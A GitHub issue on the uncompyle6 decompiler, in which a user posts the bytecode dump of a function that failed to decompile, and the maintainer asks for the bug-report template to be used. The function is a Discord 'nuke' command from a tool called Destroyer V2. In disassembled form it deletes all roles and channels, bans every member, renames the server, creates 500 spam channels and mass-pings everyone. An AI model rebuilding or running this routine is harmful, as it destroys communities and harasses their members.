### ISSUE TITLE
Decompilation failed

### ISSUE THREAD

**Issue by alexshcer** [rocky/python-uncompyle6#343]
@Destroyer.command()
async def destroy--- This code section failed: ---

 L. 329         0  SETUP_FINALLY        24  'to 24'

 L. 330         2  LOAD_FAST                'ctx'
                4  LOAD_ATTR                message
                6  LOAD_METHOD              add_reaction
                8  LOAD_CONST               u'\u2705'
               10  CALL_METHOD_1         1  ''
               12  GET_AWAITABLE    
               14  LOAD_CONST               None
               16  YIELD_FROM       
               18  POP_TOP          
               20  POP_BLOCK        
               22  JUMP_FORWARD         66  'to 66'
             24_0  COME_FROM_FINALLY     0  '0'

 L. 331        24  POP_TOP          
               26  POP_TOP          
               28  POP_TOP          

 L. 332        30  LOAD_GLOBAL              print
               32  LOAD_GLOBAL              Fore
               34  LOAD_ATTR                RESET
               36  FORMAT_VALUE          0  ''
               38  LOAD_STR                 '[SYS] '
               40  LOAD_GLOBAL              Fore
               42  LOAD_ATTR                RED
               44  FORMAT_VALUE          0  ''
               46  LOAD_STR                 "Couldn't react to message."
               48  BUILD_STRING_4        4 
               50  LOAD_GLOBAL              Fore
               52  LOAD_ATTR                RESET
               54  BINARY_ADD       
               56  CALL_FUNCTION_1       1  ''
               58  POP_TOP          
               60  POP_EXCEPT       
               62  JUMP_FORWARD         66  'to 66'
               64  END_FINALLY      
             66_0  COME_FROM            62  '62'
             66_1  COME_FROM            22  '22'

 L. 333        66  LOAD_GLOBAL              asyncio
               68  LOAD_METHOD              sleep
               70  LOAD_CONST               1
               72  CALL_METHOD_1         1  ''
               74  GET_AWAITABLE    
               76  LOAD_CONST               None
               78  YIELD_FROM       
               80  POP_TOP          

 L. 334        82  SETUP_FINALLY       104  'to 104'

 L. 335        84  LOAD_FAST                'ctx'
               86  LOAD_ATTR                message
               88  LOAD_METHOD              delete
               90  CALL_METHOD_0         0  ''
               92  GET_AWAITABLE    
               94  LOAD_CONST               None
               96  YIELD_FROM       
               98  POP_TOP          
              100  POP_BLOCK        
              102  JUMP_FORWARD        146  'to 146'
            104_0  COME_FROM_FINALLY    82  '82'

 L. 336       104  POP_TOP          
              106  POP_TOP          
              108  POP_TOP          

 L. 337       110  LOAD_GLOBAL              print
              112  LOAD_GLOBAL              Fore
              114  LOAD_ATTR                RESET
              116  FORMAT_VALUE          0  ''
              118  LOAD_STR                 '[SYS] '
              120  LOAD_GLOBAL              Fore
              122  LOAD_ATTR                RED
              124  FORMAT_VALUE          0  ''
              126  LOAD_STR                 "Couldn't delete message."
              128  BUILD_STRING_4        4 
              130  LOAD_GLOBAL              Fore
              132  LOAD_ATTR                RESET
              134  BINARY_ADD       
              136  CALL_FUNCTION_1       1  ''
              138  POP_TOP          
              140  POP_EXCEPT       
              142  JUMP_FORWARD        146  'to 146'
              144  END_FINALLY      
            146_0  COME_FROM           142  '142'
            146_1  COME_FROM           102  '102'

 L. 339       146  LOAD_FAST                'ctx'
              148  LOAD_ATTR                guild
              150  LOAD_ATTR                roles
              152  GET_ITER         
              154  FOR_ITER            272  'to 272'
              156  STORE_FAST               'role'

 L. 340       158  SETUP_FINALLY       218  'to 218'

 L. 341       160  LOAD_FAST                'role'
              162  LOAD_METHOD              delete
              164  CALL_METHOD_0         0  ''
              166  GET_AWAITABLE    
              168  LOAD_CONST               None
              170  YIELD_FROM       
              172  POP_TOP          

 L. 342       174  LOAD_GLOBAL              print
              176  LOAD_GLOBAL              Fore
              178  LOAD_ATTR                RESET
              180  FORMAT_VALUE          0  ''
              182  LOAD_STR                 '[DESTROY] '
              184  LOAD_GLOBAL              Fore
              186  LOAD_ATTR                GREEN
              188  FORMAT_VALUE          0  ''
              190  LOAD_STR                 'Deleted the role '
              192  LOAD_GLOBAL              Fore
              194  LOAD_ATTR                YELLOW
              196  FORMAT_VALUE          0  ''
              198  LOAD_FAST                'role'
              200  FORMAT_VALUE          0  ''
              202  BUILD_STRING_6        6 
              204  LOAD_GLOBAL              Fore
              206  LOAD_ATTR                RESET
              208  BINARY_ADD       
              210  CALL_FUNCTION_1       1  ''
              212  POP_TOP          
              214  POP_BLOCK        
              216  JUMP_BACK           154  'to 154'
            218_0  COME_FROM_FINALLY   158  '158'

 L. 343       218  POP_TOP          
              220  POP_TOP          
              222  POP_TOP          

 L. 344       224  LOAD_GLOBAL              print
              226  LOAD_GLOBAL              Fore
              228  LOAD_ATTR                RESET
              230  FORMAT_VALUE          0  ''
              232  LOAD_STR                 '[DESTROY] '
              234  LOAD_GLOBAL              Fore
              236  LOAD_ATTR                RED
              238  FORMAT_VALUE          0  ''
              240  LOAD_STR                 "Couldn't delete the role "
              242  LOAD_GLOBAL              Fore
              244  LOAD_ATTR                YELLOW
              246  FORMAT_VALUE          0  ''
              248  LOAD_FAST                'role'
              250  FORMAT_VALUE          0  ''
              252  BUILD_STRING_6        6 
              254  LOAD_GLOBAL              Fore
              256  LOAD_ATTR                RESET
              258  BINARY_ADD       
              260  CALL_FUNCTION_1       1  ''
              262  POP_TOP          
              264  POP_EXCEPT       
              266  JUMP_BACK           154  'to 154'
              268  END_FINALLY      
              270  JUMP_BACK           154  'to 154'

 L. 346       272  LOAD_FAST                'ctx'
              274  LOAD_ATTR                guild
              276  LOAD_ATTR                channels
              278  GET_ITER         
            280_0  COME_FROM           548  '548'
          280_282  FOR_ITER            668  'to 668'
              284  STORE_FAST               'channel'

 L. 347       286  LOAD_FAST                'channel'
              288  LOAD_ATTR                type
              290  LOAD_GLOBAL              ChannelType
              292  LOAD_ATTR                category
              294  COMPARE_OP               ==
          296_298  POP_JUMP_IF_FALSE   412  'to 412'

 L. 348       300  SETUP_FINALLY       360  'to 360'

 L. 349       302  LOAD_FAST                'channel'
              304  LOAD_METHOD              delete
              306  CALL_METHOD_0         0  ''
              308  GET_AWAITABLE    
              310  LOAD_CONST               None
              312  YIELD_FROM       
              314  POP_TOP          

 L. 350       316  LOAD_GLOBAL              print
              318  LOAD_GLOBAL              Fore
              320  LOAD_ATTR                RESET
              322  FORMAT_VALUE          0  ''
              324  LOAD_STR                 '[DESTROY] '
              326  LOAD_GLOBAL              Fore
              328  LOAD_ATTR                GREEN
              330  FORMAT_VALUE          0  ''
              332  LOAD_STR                 'Deleted the category '
              334  LOAD_GLOBAL              Fore
              336  LOAD_ATTR                YELLOW
              338  FORMAT_VALUE          0  ''
              340  LOAD_FAST                'channel'
              342  FORMAT_VALUE          0  ''
              344  BUILD_STRING_6        6 
              346  LOAD_GLOBAL              Fore
              348  LOAD_ATTR                RESET
              350  BINARY_ADD       
              352  CALL_FUNCTION_1       1  ''
              354  POP_TOP          
              356  POP_BLOCK        
              358  JUMP_FORWARD        412  'to 412'
            360_0  COME_FROM_FINALLY   300  '300'

 L. 351       360  POP_TOP          
              362  POP_TOP          
              364  POP_TOP          

 L. 352       366  LOAD_GLOBAL              print
              368  LOAD_GLOBAL              Fore
              370  LOAD_ATTR                RESET
              372  FORMAT_VALUE          0  ''
              374  LOAD_STR                 '[DESTROY] '
              376  LOAD_GLOBAL              Fore
              378  LOAD_ATTR                RED
              380  FORMAT_VALUE          0  ''
              382  LOAD_STR                 "Couldn't delete the category "
              384  LOAD_GLOBAL              Fore
              386  LOAD_ATTR                YELLOW
              388  FORMAT_VALUE          0  ''
              390  LOAD_FAST                'channel'
              392  FORMAT_VALUE          0  ''
              394  BUILD_STRING_6        6 
              396  LOAD_GLOBAL              Fore
              398  LOAD_ATTR                RESET
              400  BINARY_ADD       
              402  CALL_FUNCTION_1       1  ''
              404  POP_TOP          
              406  POP_EXCEPT       
              408  JUMP_FORWARD        412  'to 412'
              410  END_FINALLY      
            412_0  COME_FROM           408  '408'
            412_1  COME_FROM           358  '358'
            412_2  COME_FROM           296  '296'

 L. 354       412  LOAD_FAST                'channel'
              414  LOAD_ATTR                type
              416  LOAD_GLOBAL              ChannelType
              418  LOAD_ATTR                text
              420  COMPARE_OP               ==
          422_424  POP_JUMP_IF_FALSE   538  'to 538'

 L. 355       426  SETUP_FINALLY       486  'to 486'

 L. 356       428  LOAD_FAST                'channel'
              430  LOAD_METHOD              delete
              432  CALL_METHOD_0         0  ''
              434  GET_AWAITABLE    
              436  LOAD_CONST               None
              438  YIELD_FROM       
              440  POP_TOP          

 L. 357       442  LOAD_GLOBAL              print
              444  LOAD_GLOBAL              Fore
              446  LOAD_ATTR                RESET
              448  FORMAT_VALUE          0  ''
              450  LOAD_STR                 '[DESTROY] '
              452  LOAD_GLOBAL              Fore
              454  LOAD_ATTR                GREEN
              456  FORMAT_VALUE          0  ''
              458  LOAD_STR                 'Deleted the text channel '
              460  LOAD_GLOBAL              Fore
              462  LOAD_ATTR                YELLOW
              464  FORMAT_VALUE          0  ''
              466  LOAD_FAST                'channel'
              468  FORMAT_VALUE          0  ''
              470  BUILD_STRING_6        6 
              472  LOAD_GLOBAL              Fore
              474  LOAD_ATTR                RESET
              476  BINARY_ADD       
              478  CALL_FUNCTION_1       1  ''
              480  POP_TOP          
              482  POP_BLOCK        
              484  JUMP_FORWARD        538  'to 538'
            486_0  COME_FROM_FINALLY   426  '426'

 L. 358       486  POP_TOP          
              488  POP_TOP          
              490  POP_TOP          

 L. 359       492  LOAD_GLOBAL              print
              494  LOAD_GLOBAL              Fore
              496  LOAD_ATTR                RESET
              498  FORMAT_VALUE          0  ''
              500  LOAD_STR                 '[DESTROY] '
              502  LOAD_GLOBAL              Fore
              504  LOAD_ATTR                RED
              506  FORMAT_VALUE          0  ''
              508  LOAD_STR                 "Couldn't delete the text channel "
              510  LOAD_GLOBAL              Fore
              512  LOAD_ATTR                YELLOW
              514  FORMAT_VALUE          0  ''
              516  LOAD_FAST                'channel'
              518  FORMAT_VALUE          0  ''
              520  BUILD_STRING_6        6 
              522  LOAD_GLOBAL              Fore
              524  LOAD_ATTR                RESET
              526  BINARY_ADD       
              528  CALL_FUNCTION_1       1  ''
              530  POP_TOP          
              532  POP_EXCEPT       
              534  JUMP_FORWARD        538  'to 538'
              536  END_FINALLY      
            538_0  COME_FROM           534  '534'
            538_1  COME_FROM           484  '484'
            538_2  COME_FROM           422  '422'

 L. 361       538  LOAD_FAST                'channel'
              540  LOAD_ATTR                type
              542  LOAD_GLOBAL              ChannelType
              544  LOAD_ATTR                voice
              546  COMPARE_OP               ==
          548_550  POP_JUMP_IF_FALSE   280  'to 280'

 L. 362       552  SETUP_FINALLY       612  'to 612'

 L. 363       554  LOAD_FAST                'channel'
              556  LOAD_METHOD              delete
              558  CALL_METHOD_0         0  ''
              560  GET_AWAITABLE    
              562  LOAD_CONST               None
              564  YIELD_FROM       
              566  POP_TOP          

 L. 364       568  LOAD_GLOBAL              print
              570  LOAD_GLOBAL              Fore
              572  LOAD_ATTR                RESET
              574  FORMAT_VALUE          0  ''
              576  LOAD_STR                 '[DESTROY] '
              578  LOAD_GLOBAL              Fore
              580  LOAD_ATTR                GREEN
              582  FORMAT_VALUE          0  ''
              584  LOAD_STR                 'Deleted the voice channel '
              586  LOAD_GLOBAL              Fore
              588  LOAD_ATTR                YELLOW
              590  FORMAT_VALUE          0  ''
              592  LOAD_FAST                'channel'
              594  FORMAT_VALUE          0  ''
              596  BUILD_STRING_6        6 
              598  LOAD_GLOBAL              Fore
              600  LOAD_ATTR                RESET
              602  BINARY_ADD       
              604  CALL_FUNCTION_1       1  ''
              606  POP_TOP          
              608  POP_BLOCK        
              610  JUMP_BACK           280  'to 280'
            612_0  COME_FROM_FINALLY   552  '552'

 L. 365       612  POP_TOP          
              614  POP_TOP          
              616  POP_TOP          

 L. 366       618  LOAD_GLOBAL              print
              620  LOAD_GLOBAL              Fore
              622  LOAD_ATTR                RESET
              624  FORMAT_VALUE          0  ''
              626  LOAD_STR                 '[DESTROY] '
              628  LOAD_GLOBAL              Fore
              630  LOAD_ATTR                RED
              632  FORMAT_VALUE          0  ''
              634  LOAD_STR                 "Couldn't delete the voice channel "
              636  LOAD_GLOBAL              Fore
              638  LOAD_ATTR                YELLOW
              640  FORMAT_VALUE          0  ''
              642  LOAD_FAST                'channel'
              644  FORMAT_VALUE          0  ''
              646  BUILD_STRING_6        6 
              648  LOAD_GLOBAL              Fore
              650  LOAD_ATTR                RESET
              652  BINARY_ADD       
              654  CALL_FUNCTION_1       1  ''
              656  POP_TOP          
              658  POP_EXCEPT       
              660  JUMP_BACK           280  'to 280'
              662  END_FINALLY      
          664_666  JUMP_BACK           280  'to 280'

 L. 368       668  LOAD_FAST                'ctx'
              670  LOAD_ATTR                guild
              672  LOAD_ATTR                members
              674  GET_ITER         
              676  FOR_ITER            820  'to 820'
              678  STORE_FAST               'member'

 L. 369       680  SETUP_FINALLY       758  'to 758'

 L. 370       682  LOAD_FAST                'member'
              684  LOAD_METHOD              send
              686  LOAD_FAST                'ctx'
              688  LOAD_ATTR                guild
              690  LOAD_ATTR                name
              692  FORMAT_VALUE          0  ''
              694  LOAD_STR                 ' was destroyed by Destroyer V2. You will now (possibly) be banned.\nDestroyer V2 was made by Snipcola, and you can get it at https://youtube.com/snipcola.'
              696  BUILD_STRING_2        2 
              698  CALL_METHOD_1         1  ''
              700  GET_AWAITABLE    
              702  LOAD_CONST               None
              704  YIELD_FROM       
              706  POP_TOP          

 L. 371       708  LOAD_GLOBAL              print
              710  LOAD_GLOBAL              Fore
              712  LOAD_ATTR                RESET
              714  FORMAT_VALUE          0  ''
              716  LOAD_STR                 '[DESTROY] '
              718  LOAD_GLOBAL              Fore
              720  LOAD_ATTR                GREEN
              722  FORMAT_VALUE          0  ''
              724  LOAD_STR                 'DMed the user '
              726  LOAD_GLOBAL              Fore
              728  LOAD_ATTR                YELLOW
              730  FORMAT_VALUE          0  ''
              732  LOAD_FAST                'member'
              734  FORMAT_VALUE          0  ''
              736  LOAD_GLOBAL              Fore
              738  LOAD_ATTR                RED
              740  FORMAT_VALUE          0  ''
              742  BUILD_STRING_7        7 
              744  LOAD_GLOBAL              Fore
              746  LOAD_ATTR                RESET
              748  BINARY_ADD       
              750  CALL_FUNCTION_1       1  ''
              752  POP_TOP          
              754  POP_BLOCK        
              756  JUMP_BACK           676  'to 676'
            758_0  COME_FROM_FINALLY   680  '680'

 L. 372       758  POP_TOP          
              760  POP_TOP          
              762  POP_TOP          

 L. 373       764  LOAD_GLOBAL              print
              766  LOAD_GLOBAL              Fore
              768  LOAD_ATTR                RESET
              770  FORMAT_VALUE          0  ''
              772  LOAD_STR                 '[DESTROY] '
              774  LOAD_GLOBAL              Fore
              776  LOAD_ATTR                RED
              778  FORMAT_VALUE          0  ''
              780  LOAD_STR                 "Couldn't DM the user "
              782  LOAD_GLOBAL              Fore
              784  LOAD_ATTR                YELLOW
              786  FORMAT_VALUE          0  ''
              788  LOAD_FAST                'member'
              790  FORMAT_VALUE          0  ''
              792  LOAD_GLOBAL              Fore
              794  LOAD_ATTR                RED
              796  FORMAT_VALUE          0  ''
              798  BUILD_STRING_7        7 
              800  LOAD_GLOBAL              Fore
              802  LOAD_ATTR                RESET
              804  BINARY_ADD       
              806  CALL_FUNCTION_1       1  ''
              808  POP_TOP          
              810  POP_EXCEPT       
              812  JUMP_BACK           676  'to 676'
              814  END_FINALLY      
          816_818  JUMP_BACK           676  'to 676'

 L. 375       820  LOAD_FAST                'ctx'
              822  LOAD_ATTR                guild
              824  LOAD_ATTR                members
              826  GET_ITER         
              828  FOR_ITER            952  'to 952'
              830  STORE_FAST               'member'

 L. 376       832  SETUP_FINALLY       896  'to 896'

 L. 377       834  LOAD_FAST                'member'
              836  LOAD_ATTR                ban
              838  LOAD_STR                 'Banned by Destroyer V2'
              840  LOAD_CONST               ('reason',)
              842  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'
              844  GET_AWAITABLE    
              846  LOAD_CONST               None
              848  YIELD_FROM       
              850  POP_TOP          

 L. 378       852  LOAD_GLOBAL              print
              854  LOAD_GLOBAL              Fore
              856  LOAD_ATTR                RESET
              858  FORMAT_VALUE          0  ''
              860  LOAD_STR                 '[DESTROY] '
              862  LOAD_GLOBAL              Fore
              864  LOAD_ATTR                GREEN
              866  FORMAT_VALUE          0  ''
              868  LOAD_STR                 'Banned the user '
              870  LOAD_GLOBAL              Fore
              872  LOAD_ATTR                YELLOW
              874  FORMAT_VALUE          0  ''
              876  LOAD_FAST                'member'
              878  FORMAT_VALUE          0  ''
              880  BUILD_STRING_6        6 
              882  LOAD_GLOBAL              Fore
              884  LOAD_ATTR                RESET
              886  BINARY_ADD       
              888  CALL_FUNCTION_1       1  ''
              890  POP_TOP          
              892  POP_BLOCK        
              894  JUMP_BACK           828  'to 828'
            896_0  COME_FROM_FINALLY   832  '832'

 L. 379       896  POP_TOP          
              898  POP_TOP          
              900  POP_TOP          

 L. 380       902  LOAD_GLOBAL              print
              904  LOAD_GLOBAL              Fore
              906  LOAD_ATTR                RESET
              908  FORMAT_VALUE          0  ''
              910  LOAD_STR                 '[DESTROY] '
              912  LOAD_GLOBAL              Fore
              914  LOAD_ATTR                RED
              916  FORMAT_VALUE          0  ''
              918  LOAD_STR                 "Couldn't ban the user "
              920  LOAD_GLOBAL              Fore
              922  LOAD_ATTR                YELLOW
              924  FORMAT_VALUE          0  ''
              926  LOAD_FAST                'member'
              928  FORMAT_VALUE          0  ''
              930  BUILD_STRING_6        6 
              932  LOAD_GLOBAL              Fore
              934  LOAD_ATTR                RESET
              936  BINARY_ADD       
              938  CALL_FUNCTION_1       1  ''
              940  POP_TOP          
              942  POP_EXCEPT       
              944  JUMP_BACK           828  'to 828'
              946  END_FINALLY      
          948_950  JUMP_BACK           828  'to 828'

 L. 382       952  LOAD_STR                 'Destroyed by Destroyer V2'
              954  STORE_FAST               'serverName'

 L. 383       956  SETUP_FINALLY      1026  'to 1026'

 L. 384       958  LOAD_FAST                'ctx'
              960  LOAD_ATTR                guild
              962  LOAD_ATTR                edit
              964  LOAD_FAST                'serverName'
              966  LOAD_CONST               ('name',)
              968  CALL_FUNCTION_KW_1     1  '1 total positional and keyword args'
              970  GET_AWAITABLE    
              972  LOAD_CONST               None
              974  YIELD_FROM       
              976  POP_TOP          

 L. 385       978  LOAD_GLOBAL              print
              980  LOAD_GLOBAL              Fore
              982  LOAD_ATTR                RESET
              984  FORMAT_VALUE          0  ''
              986  LOAD_STR                 '[DESTROY] '
              988  LOAD_GLOBAL              Fore
              990  LOAD_ATTR                GREEN
              992  FORMAT_VALUE          0  ''
              994  LOAD_STR                 'Changed the server name to '
              996  LOAD_GLOBAL              Fore
              998  LOAD_ATTR                YELLOW
             1000  FORMAT_VALUE          0  ''
             1002  LOAD_STR                 "'"
             1004  LOAD_FAST                'serverName'
             1006  FORMAT_VALUE          0  ''
             1008  LOAD_STR                 "'"
             1010  BUILD_STRING_8        8 
             1012  LOAD_GLOBAL              Fore
             1014  LOAD_ATTR                RESET
             1016  BINARY_ADD       
             1018  CALL_FUNCTION_1       1  ''
             1020  POP_TOP          
             1022  POP_BLOCK        
             1024  JUMP_FORWARD       1082  'to 1082'
           1026_0  COME_FROM_FINALLY   956  '956'

 L. 386      1026  POP_TOP          
             1028  POP_TOP          
             1030  POP_TOP          

 L. 387      1032  LOAD_GLOBAL              print
             1034  LOAD_GLOBAL              Fore
             1036  LOAD_ATTR                RESET
             1038  FORMAT_VALUE          0  ''
             1040  LOAD_STR                 '[DESTROY] '
             1042  LOAD_GLOBAL              Fore
             1044  LOAD_ATTR                GREEN
             1046  FORMAT_VALUE          0  ''
             1048  LOAD_STR                 "Couldn't change the server name to "
             1050  LOAD_GLOBAL              Fore
             1052  LOAD_ATTR                YELLOW
             1054  FORMAT_VALUE          0  ''
             1056  LOAD_STR                 "'"
             1058  LOAD_FAST                'serverName'
             1060  FORMAT_VALUE          0  ''
             1062  LOAD_STR                 "'"
             1064  BUILD_STRING_8        8 
             1066  LOAD_GLOBAL              Fore
             1068  LOAD_ATTR                RESET
             1070  BINARY_ADD       
             1072  CALL_FUNCTION_1       1  ''
             1074  POP_TOP          
             1076  POP_EXCEPT       
             1078  JUMP_FORWARD       1082  'to 1082'
             1080  END_FINALLY      
           1082_0  COME_FROM          1078  '1078'
           1082_1  COME_FROM          1024  '1024'

 L. 389      1082  LOAD_CONST               0
             1084  STORE_FAST               'channelCount'

 L. 390      1086  LOAD_STR                 'destroyed-by-destroyer-v2'
             1088  STORE_FAST               'channelName'

 L. 391      1090  LOAD_FAST                'channelCount'
             1092  LOAD_CONST               500
             1094  COMPARE_OP               <
         1096_1098  POP_JUMP_IF_FALSE  1264  'to 1264'

 L. 392      1100  SETUP_FINALLY      1182  'to 1182'

 L. 393      1102  LOAD_FAST                'channelCount'
             1104  LOAD_CONST               1
             1106  INPLACE_ADD      
             1108  STORE_FAST               'channelCount'

 L. 394      1110  LOAD_FAST                'ctx'
             1112  LOAD_ATTR                guild
             1114  LOAD_METHOD              create_text_channel
             1116  LOAD_FAST                'channelName'
             1118  CALL_METHOD_1         1  ''
             1120  GET_AWAITABLE    
             1122  LOAD_CONST               None
             1124  YIELD_FROM       
             1126  POP_TOP          

 L. 395      1128  LOAD_GLOBAL              print
             1130  LOAD_GLOBAL              Fore
             1132  LOAD_ATTR                RESET
             1134  FORMAT_VALUE          0  ''
             1136  LOAD_STR                 '[DESTROY] '
             1138  LOAD_GLOBAL              Fore
             1140  LOAD_ATTR                GREEN
             1142  FORMAT_VALUE          0  ''
             1144  LOAD_STR                 'Created a channel named '
             1146  LOAD_GLOBAL              Fore
             1148  LOAD_ATTR                YELLOW
             1150  FORMAT_VALUE          0  ''
             1152  LOAD_STR                 "'"
             1154  LOAD_FAST                'channelName'
             1156  FORMAT_VALUE          0  ''
             1158  LOAD_STR                 "' ["
             1160  LOAD_FAST                'channelCount'
             1162  FORMAT_VALUE          0  ''
             1164  LOAD_STR                 '/500]'
             1166  BUILD_STRING_10      10 
             1168  LOAD_GLOBAL              Fore
             1170  LOAD_ATTR                RESET
             1172  BINARY_ADD       
             1174  CALL_FUNCTION_1       1  ''
             1176  POP_TOP          
             1178  POP_BLOCK        
             1180  JUMP_BACK          1090  'to 1090'
           1182_0  COME_FROM_FINALLY  1100  '1100'

 L. 396      1182  POP_TOP          
             1184  POP_TOP          
             1186  POP_TOP          

 L. 397      1188  LOAD_GLOBAL              print
             1190  LOAD_GLOBAL              Fore
             1192  LOAD_ATTR                RESET
             1194  FORMAT_VALUE          0  ''
             1196  LOAD_STR                 '[DESTROY] '
             1198  LOAD_GLOBAL              Fore
             1200  LOAD_ATTR                RED
             1202  FORMAT_VALUE          0  ''
             1204  LOAD_STR                 "Couldn't create a channel named "
             1206  LOAD_GLOBAL              Fore
             1208  LOAD_ATTR                YELLOW
             1210  FORMAT_VALUE          0  ''
             1212  LOAD_STR                 "'"
             1214  LOAD_FAST                'channelName'
             1216  FORMAT_VALUE          0  ''
             1218  LOAD_STR                 "'"
             1220  LOAD_GLOBAL              Fore
             1222  LOAD_ATTR                RESET
             1224  FORMAT_VALUE          0  ''
             1226  LOAD_STR                 '.'
             1228  LOAD_GLOBAL              Fore
             1230  LOAD_ATTR                RED
             1232  FORMAT_VALUE          0  ''
             1234  LOAD_STR                 ' Aborting.'
             1236  BUILD_STRING_12      12 
             1238  LOAD_GLOBAL              Fore
             1240  LOAD_ATTR                RESET
             1242  BINARY_ADD       
             1244  CALL_FUNCTION_1       1  ''
             1246  POP_TOP          

 L. 398      1248  POP_EXCEPT       
         1250_1252  JUMP_ABSOLUTE      1264  'to 1264'
             1254  POP_EXCEPT       
             1256  JUMP_BACK          1090  'to 1090'
             1258  END_FINALLY      
         1260_1262  JUMP_BACK          1090  'to 1090'
           1264_0  COME_FROM          1096  '1096'

 L. 400      1264  LOAD_CONST               0
             1266  STORE_FAST               'pingCount'

 L. 401      1268  LOAD_FAST                'pingCount'
             1270  LOAD_GLOBAL              len
             1272  LOAD_FAST                'ctx'
             1274  LOAD_ATTR                guild
             1276  LOAD_ATTR                text_channels
             1278  CALL_FUNCTION_1       1  ''
             1280  COMPARE_OP               <
         1282_1284  POP_JUMP_IF_FALSE  1484  'to 1484'

 L. 402      1286  LOAD_FAST                'ctx'
             1288  LOAD_ATTR                guild
             1290  LOAD_ATTR                text_channels
             1292  GET_ITER         
             1294  FOR_ITER           1480  'to 1480'
             1296  STORE_FAST               'channel'

 L. 403      1298  SETUP_FINALLY      1394  'to 1394'

 L. 404      1300  LOAD_FAST                'pingCount'
             1302  LOAD_CONST               1
             1304  INPLACE_ADD      
             1306  STORE_FAST               'pingCount'

 L. 405      1308  LOAD_FAST                'channel'
             1310  LOAD_METHOD              send
             1312  LOAD_STR                 'This server was destroyed by Destroyer V2. \nDestroyer V2 was made by Snipcola, and you can get it at https://@everyone@youtube.com/snipcola or https://@everyone@snipcola.xyz.'
             1314  CALL_METHOD_1         1  ''
             1316  GET_AWAITABLE    
             1318  LOAD_CONST               None
             1320  YIELD_FROM       
             1322  POP_TOP          

 L. 406      1324  LOAD_GLOBAL              print
             1326  LOAD_GLOBAL              Fore
             1328  LOAD_ATTR                RESET
             1330  FORMAT_VALUE          0  ''
             1332  LOAD_STR                 '[MASS PING] '
             1334  LOAD_GLOBAL              Fore
             1336  LOAD_ATTR                GREEN
             1338  FORMAT_VALUE          0  ''
             1340  LOAD_STR                 'Pinged everyone in '
             1342  LOAD_GLOBAL              Fore
             1344  LOAD_ATTR                YELLOW
             1346  FORMAT_VALUE          0  ''
             1348  LOAD_STR                 "'"
             1350  LOAD_FAST                'channel'
             1352  LOAD_ATTR                name
             1354  FORMAT_VALUE          0  ''
             1356  LOAD_STR                 "' ["
             1358  LOAD_FAST                'pingCount'
             1360  FORMAT_VALUE          0  ''
             1362  LOAD_STR                 '/'
             1364  LOAD_GLOBAL              len
             1366  LOAD_FAST                'ctx'
             1368  LOAD_ATTR                guild
             1370  LOAD_ATTR                text_channels
             1372  CALL_FUNCTION_1       1  ''
             1374  FORMAT_VALUE          0  ''
             1376  LOAD_STR                 ']'
             1378  BUILD_STRING_12      12 
             1380  LOAD_GLOBAL              Fore
             1382  LOAD_ATTR                RESET
             1384  BINARY_ADD       
             1386  CALL_FUNCTION_1       1  ''
             1388  POP_TOP          
             1390  POP_BLOCK        
             1392  JUMP_BACK          1294  'to 1294'
           1394_0  COME_FROM_FINALLY  1298  '1298'

 L. 407      1394  POP_TOP          
             1396  POP_TOP          
             1398  POP_TOP          

 L. 408      1400  LOAD_GLOBAL              print
             1402  LOAD_GLOBAL              Fore
             1404  LOAD_ATTR                RESET
             1406  FORMAT_VALUE          0  ''
             1408  LOAD_STR                 '[DESTROY] '
             1410  LOAD_GLOBAL              Fore
             1412  LOAD_ATTR                RED
             1414  FORMAT_VALUE          0  ''
             1416  LOAD_STR                 "Couldn't ping everyone in "
             1418  LOAD_GLOBAL              Fore
             1420  LOAD_ATTR                YELLOW
             1422  FORMAT_VALUE          0  ''
             1424  LOAD_STR                 "'"
             1426  LOAD_FAST                'channel'
             1428  LOAD_ATTR                name
             1430  FORMAT_VALUE          0  ''
             1432  LOAD_STR                 "'"
             1434  LOAD_GLOBAL              Fore
             1436  LOAD_ATTR                RESET
             1438  FORMAT_VALUE          0  ''
             1440  LOAD_STR                 '.'
             1442  LOAD_GLOBAL              Fore
             1444  LOAD_ATTR                RED
             1446  FORMAT_VALUE          0  ''
             1448  LOAD_STR                 ' Aborting.'
             1450  BUILD_STRING_12      12 
             1452  LOAD_GLOBAL              Fore
             1454  LOAD_ATTR                RESET
             1456  BINARY_ADD       
             1458  CALL_FUNCTION_1       1  ''
             1460  POP_TOP          

 L. 409      1462  POP_EXCEPT       
             1464  POP_TOP          
         1466_1468  JUMP_BACK          1268  'to 1268'
             1470  POP_EXCEPT       
             1472  JUMP_BACK          1294  'to 1294'
             1474  END_FINALLY      
         1476_1478  JUMP_BACK          1294  'to 1294'
         1480_1482  JUMP_BACK          1268  'to 1268'
           1484_0  COME_FROM          1282  '1282'

 L. 410      1484  LOAD_GLOBAL              print
             1486  LOAD_GLOBAL              Fore
             1488  LOAD_ATTR                RESET
             1490  FORMAT_VALUE          0  ''
             1492  LOAD_STR                 '[DESTROY] '
             1494  LOAD_GLOBAL              Fore
             1496  LOAD_ATTR                GREEN
             1498  FORMAT_VALUE          0  ''
             1500  LOAD_STR                 'Successfully destroyed server.'
             1502  BUILD_STRING_4        4 
             1504  LOAD_GLOBAL              Fore
             1506  LOAD_ATTR                RESET
             1508  BINARY_ADD       
             1510  CALL_FUNCTION_1       1  ''
             1512  POP_TOP          

Parse error at or near `POP_EXCEPT' instruction at offset 1254

**Comment by rocky** [comment]
Please read and follow the instructions in https://github.com/rocky/python-uncompyle6/issues/new?assignees=&labels=&template=bug-report.md
